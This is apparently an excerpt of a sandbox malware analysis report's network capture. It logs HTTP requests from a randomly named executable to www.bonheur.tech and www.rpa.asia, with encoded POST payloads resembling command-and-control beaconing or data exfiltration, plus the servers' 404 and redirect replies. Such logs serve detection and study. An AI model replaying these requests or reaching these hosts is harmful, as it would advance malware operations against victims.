                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 67 4f 6b 54 6b 78 2f 47 7a 6a 35 35 49 55 76 34 73 6c 44 34 61 4f 31 64 6e 36 4b 2f 46 5a 56 58 6d 65 39 51 7a 37 4c 37 6d 46 78 30 6c 33 51 49 4a 30 32 2f 36 4e 33 45 45 4d 68 4b 46 6d 70 63 4b 33 51 66 54 7a 37 59 61 66 62 6a 6a 61 7a 7a 34 61 36 59 68 5a 2f 50 52 6c 33 70 35 70 34 51 65 59 36 34 31 76 32 5a 62 66 79 64 4a 31 64 66 32 72 73 69 46 63 58 42 6e 77 37 72 54 34 69 52 67 6b 77 71 42 57 38 45 73 77 4b 6f 6c 4d 6f 55 33 2f 6f 58 54 51 64 49 4f 61 68 4f 4c 52 45 2f 5a 58 5a 6d 69 6e 46 4c 30 73 50 54 6f 53 4f 33 44 65 42 75 73 4b 49 66 6a 48 71 30 74 5a 34 68 4a 45 61 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct2w3KwuXOQaRK62qCgK6izQQR3PnNt533x8d+D88qVrtl/3novBX0mAk2V5J3X9OtW7NlxcJXlMu/9n0cog9lsLFfjwmgIBwgOkTkx/Gzj55IUv4slD4aO1dn6K/FZVXme9Qz7L7mFx0l3QIJ02/6N3EEMhKFmpcK3QfTz7Yafbjjazz4a6YhZ/PRl3p5p4QeY641v2ZbfydJ1df2rsiFcXBnw7rT4iRgkwqBW8EswKolMoU3/oXTQdIOahOLRE/ZXZminFL0sPToSO3DeBusKIfjHq0tZ4hJEaiilHmTTtD38ZGYUDM/e+hD/aMayxD5WffjOlR+OlJNk7GbIkughJUgh7xbpdD2z+cQYtEyWkzxtK34F0llOeZEevfNva/AwY/8YRHU+T1l+5SJSDev/R6wdyDmN6dBmgMb3SGyfy2DzWD99knLlkU5Ln5auYrOtk0u/vkLhgVd56DicIPZnt/lrqDdu5eur8olMVQE1xxmFRtQ89fQUOALSBerdr2Q8gWpbud3r7K78aL9VCJ5FwHkDAoppf9fJzKXf4z6E6Tm7er9Iqd1L/QnbiEVvbnAOeljtvf6XoiMFus4Yf9Um72Bcaa8qQper6F64IdmexJ80qX0YST+S5WY8+qi+62dJeNv0DmhMP3hyGbMBsaMibcpVVewsDNpLXTrvGH5NcCkhqhV5vHntWgHr0ZkZl/KrgSC7NzWF6mnVvNRuXROwHMFLzjATylER94zk8KTZSMigRk2y4d+MEtQxkag7O2h1YfKCXQ34b+TU/MRprtGeFOJKKOiCFKWCnUumUaQbZF0l+MZ2n3aKGwrzHI7zV6g3U7JggiYEqD3a0V02eZb1WOFtDeNgtFTKO5qhkW5dgrkOqYZFqJk0ziLNEZVU7QQRiyhMfu72pWAgNYyYyQs8E9Ymf7GjLbMFVkBUuF94ELLf4pj9Is8xzzxr4VQHd702bYU [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:19.503109932 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.11.304984413.248.169.48805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:22.034774065 CET535OUTGET /t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA= HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:55:22.175661087 CET379INHTTP/1.1 200 OK
                                                                                    content-type: text/html
                                                                                    date: Thu, 09 Jan 2025 15:55:22 GMT
                                                                                    content-length: 258
                                                                                    connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 26 36 42 2d 6c 37 46 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 71 49 78 5a 2b 50 4c 61 34 73 58 54 59 57 41 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 43 4d 4d 71 6b 6e 47 34 79 64 77 4c 33 56 32 33 4f 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA="}</script></head></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.11.3049845160.25.166.123805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:28.188802004 CET787OUTPOST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 75 4a 41 67 47 4b 30 43 62 63 6f 34 57 76 37 4a 63 61 31 7a 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BruJAgGK0Cbco4Wv7Jca1zA==
                                                                                    Jan 9, 2025 16:55:28.531186104 CET1289INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:55:28 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:28.531197071 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.11.3049846160.25.166.123805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:31.089350939 CET807OUTPOST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 33 39 57 2f 6c 49 64 2f 76 36 62 68 50 55 6f 63 66 6d 39 49 3d
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIM39W/lId/v6bhPUocfm9I=
                                                                                    Jan 9, 2025 16:55:31.447804928 CET1289INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:55:31 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:31.447814941 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.11.3049847160.25.166.123805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:33.979420900 CET3924OUTPOST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 67 70 58 43 6b 4e 4d 75 68 38 44 77 67 72 48 74 72 47 49 4e 50 47 6f 32 4f 2b 33 79 71 48 31 38 45 30 36 6c 68 75 52 61 6c 52 32 58 49 70 30 75 34 7a 50 6b 43 76 76 39 78 4c 63 46 34 77 6e 6b 42 75 6a 4d 38 64 6c 69 41 61 63 4a 6b 59 72 71 6a 52 36 73 65 6a 79 72 78 65 38 61 39 6c 38 30 33 6c 38 32 62 2b 47 65 70 77 4c 36 4e 49 66 41 53 50 69 44 6a 78 6b 6b 31 54 4e 52 34 4f 62 6a 45 74 59 69 68 31 31 37 37 57 43 62 2b 56 6f 33 71 52 46 66 53 39 5a 66 65 78 67 56 32 41 30 72 61 33 55 43 68 46 59 51 35 64 38 78 33 6c 75 38 6f 55 61 6c 53 58 64 50 63 53 2b 6c 76 6c 6f 41 59 7a 6e [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBgpXCkNMuh8DwgrHtrGINPGo2O+3yqH18E06lhuRalR2XIp0u4zPkCvv9xLcF4wnkBujM8dliAacJkYrqjR6sejyrxe8a9l803l82b+GepwL6NIfASPiDjxkk1TNR4ObjEtYih1177WCb+Vo3qRFfS9ZfexgV2A0ra3UChFYQ5d8x3lu8oUalSXdPcS+lvloAYzncDmJc9a+uVVJcviBJlqCatS/Kd3Cwkeu7S2ikLafNUHHDRAUwZeEdOCkujulYzKH4RKZ3MLSmm74jZVOjaLUz/XwDC43zkx5zf7A2Le3lqs5REb5BxZYWgqu44jwmb71HwqduGZzWYuOeIb8yQuviwD4E5kPOvpQzov1N1FyKeTXQuwBHCRj8luzmM4PV8iWqf4WHZ6Gkj6FWkXJS+erg7AxstXkJOI8ujkysQsgKn6UzHWJpvpFfzZdqXS7CjjkfzkNCk915PNreSd4a8kFjmWWyJJN5KnRFZA7K9QcitJgWtYMy9NSo9G+5yRLyoGvvDhGFQU1A/2UdUNZcr7AAwHa/STI3azCl2UYdIlx7il6VC5fyWNjzlqtSZdlTr2rXSvVcTX967AsT0uPsvZa184HEMuCk3yyHYC6TFa7yF08BtAY5jYBF588Xwd48Wy2/cEsLlrmU4KBS/OJSXOlnMHutdE+VuXEcyDcqjDC0DkKrqtrOCPWdg35+ejjW50uD4zSGJyxK9S160mPnLUE1dLnMKKN/M1uSj0Nvd4kkNR7UWPDEpMtv7AV01B25ipraOrUvUgUyZ0fzvQQFb7L4ALyJKg5fdWFb4OmkILcI57hEF0QbJq6evMc0Mty3ydZuWMNcMn3gRKpelWnY7dkAHc+IrPaQahOIs [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:34.328692913 CET1289INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:55:34 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:34.328737020 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.11.3049848160.25.166.123805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:36.868823051 CET531OUTGET /bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:55:37.220998049 CET1289INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:55:37 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
